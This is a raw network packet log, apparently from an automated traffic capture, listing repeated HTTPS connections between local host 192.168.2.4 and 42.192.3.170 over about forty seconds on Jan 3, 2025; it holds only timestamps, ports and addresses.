                  Jan 3, 2025 02:53:34.257903099 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:34.258191109 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:34.258200884 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:35.459125042 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:35.459182978 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:35.459589958 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:35.459597111 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:35.461162090 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:35.461168051 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:36.016417027 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:36.016474009 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:36.016659021 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.039113998 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.039127111 CET4435003042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:36.039134979 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.039186954 CET50030443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.148978949 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.149008036 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:36.150917053 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.154860973 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:36.154875040 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.304322004 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.306900024 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.308706999 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.308720112 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.309986115 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.309992075 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.833458900 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.833513021 CET4435003842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.833545923 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.834424019 CET50038443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.944889069 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.944906950 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:37.945313931 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.945554018 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:37.945573092 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.119262934 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.119333982 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.119822025 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.119827032 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.121253014 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.121262074 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.651360035 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.651446104 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.651464939 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.651581049 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.651855946 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.651882887 CET4435005242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.651957989 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.651976109 CET50052443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.758872032 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.758919954 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:39.759741068 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.760113001 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:39.760128975 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:40.934792995 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:40.934854031 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:40.935266972 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:40.935276985 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:40.936450005 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:40.936455011 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:41.471461058 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:41.471510887 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.471518993 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:41.471558094 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.471877098 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.471895933 CET4435005742.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:41.471904039 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.471945047 CET50057443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.586873055 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.586913109 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:41.590926886 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.594875097 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:41.594885111 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:42.786025047 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:42.786092997 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:42.786550045 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:42.786561966 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:42.788049936 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:42.788055897 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:43.341855049 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:43.341927052 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.341962099 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:43.341981888 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:43.342008114 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.342022896 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.344532967 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.344557047 CET4435005842.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:43.344568014 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.344604015 CET50058443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.462093115 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.462142944 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:43.462209940 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.462515116 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:43.462532043 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:44.637552023 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:44.637614965 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:44.721400023 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:44.721425056 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:44.728518009 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:44.728538036 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:45.176093102 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:45.176156044 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:45.176199913 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.176199913 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.181081057 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.181129932 CET4435005942.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:45.181154966 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.181190014 CET50059443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.289247990 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.289292097 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:45.289343119 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.289674997 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:45.289690018 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:46.483700037 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:46.485393047 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:46.485393047 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:46.485424995 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:46.489044905 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:46.489056110 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:47.019481897 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:47.019560099 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:47.019570112 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.019613028 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.065728903 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.065767050 CET4435006042.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:47.065778017 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.065810919 CET50060443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.288036108 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.288079977 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:47.288141966 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.299072981 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:47.299086094 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:48.508678913 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:48.508833885 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:48.509326935 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:48.509337902 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:48.510888100 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:48.510893106 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:49.065687895 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:49.065754890 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.065773010 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:49.065900087 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.068741083 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.068759918 CET4435006142.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:49.068778992 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.068839073 CET50061443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.180133104 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.180193901 CET4435006242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:49.180259943 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.180592060 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:49.180607080 CET4435006242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:50.354922056 CET4435006242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:50.361140013 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.475450993 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.475476027 CET4435006242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:50.486637115 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.486644030 CET4435006242.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:50.724625111 CET50062443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.852170944 CET50063443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.852222919 CET4435006342.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:50.852289915 CET50063443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.852575064 CET50063443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:50.852588892 CET4435006342.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:54.865123034 CET50063443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:55.023817062 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:55.023861885 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:55.023921013 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:55.024281979 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:55.024307013 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.243635893 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.243839025 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.257507086 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.257528067 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.257958889 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.258058071 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.258430004 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.299343109 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.804083109 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.804137945 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.804143906 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.804182053 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.812699080 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.812715054 CET4435006442.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.812727928 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.812758923 CET50064443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.929743052 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.929780960 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:56.929842949 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.930056095 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:56.930068970 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.088165045 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.090991974 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.091604948 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.091614008 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.094906092 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.094911098 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.618912935 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.618971109 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.618977070 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.619060040 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.619263887 CET50065443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.619278908 CET4435006542.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.775778055 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.775834084 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:58.775890112 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.776165009 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:58.776182890 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:59.955770969 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:59.955837011 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:59.956279039 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:59.956294060 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:53:59.957607985 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:53:59.957612991 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:00.505203962 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:00.505264044 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:00.505273104 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.505304098 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.505669117 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.505688906 CET4435006642.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:00.505732059 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.505757093 CET50066443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.649350882 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.649386883 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:00.649466991 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.650274992 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:00.650286913 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:01.839909077 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:01.841278076 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:01.889750004 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:01.889763117 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:01.891182899 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:01.891187906 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:02.375370026 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:02.375436068 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:02.375550032 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.399238110 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.399269104 CET4435006742.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:02.399298906 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.399354935 CET50067443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.510910988 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.510950089 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:02.511090994 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.514906883 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:02.514921904 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:03.665793896 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:03.669404984 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:03.669404984 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:03.669429064 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:03.673202991 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:03.673208952 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:04.199076891 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:04.199143887 CET4435006842.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:04.199872017 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:04.199872017 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:04.199965000 CET50068443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:04.414011955 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:04.414057016 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:04.417201042 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:04.417201042 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:04.417247057 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:05.659507990 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:05.659715891 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:05.660164118 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:05.660180092 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:05.661560059 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:05.661573887 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:06.236856937 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:06.236934900 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:06.237051964 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.237051964 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.237807989 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.237808943 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.237831116 CET4435006942.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:06.239420891 CET50069443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.586335897 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.586369038 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:06.586508989 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.586802006 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:06.586812973 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:07.744894981 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:07.745043039 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:07.746936083 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:07.746936083 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:07.746943951 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:07.746958971 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:08.278393984 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:08.278448105 CET4435007042.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:08.279181957 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:08.279181957 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:08.279242039 CET50070443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:08.571048021 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:08.571141958 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:08.571285009 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:08.571496964 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:08.571535110 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:09.748260975 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:09.748437881 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:09.748948097 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:09.748995066 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:09.750930071 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:09.750943899 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:10.286694050 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:10.286756039 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:10.291034937 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.291884899 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.291884899 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.291914940 CET4435007142.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:10.294871092 CET50071443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.554928064 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.554971933 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:10.559262037 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.559262037 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:10.559300900 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:11.776932955 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:11.777020931 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:11.777493954 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:11.777504921 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:11.780950069 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:11.780956030 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:12.337330103 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:12.337397099 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.337413073 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:12.337546110 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.337865114 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.337865114 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.337888956 CET4435007242.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:12.338263988 CET50072443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.507345915 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.507389069 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:12.507575989 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.507900000 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:12.507911921 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:13.731447935 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:13.735289097 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:13.753897905 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:13.753906012 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:13.763045073 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:13.763050079 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:14.294331074 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:14.294387102 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:14.294400930 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.294539928 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.294894934 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.294894934 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.294913054 CET4435007342.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:14.295217991 CET50073443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.538698912 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.538758039 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:14.539156914 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.542937994 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:14.542960882 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:15.740145922 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:15.743424892 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:15.743426085 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:15.743454933 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:15.745976925 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:15.745982885 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:16.293469906 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:16.293523073 CET4435007442.192.3.170192.168.2.4
                  Jan 3, 2025 02:54:16.293579102 CET50074443192.168.2.442.192.3.170
                  Jan 3, 2025 02:54:16.294260979 CET50074443192.168.2.442.192.3.170
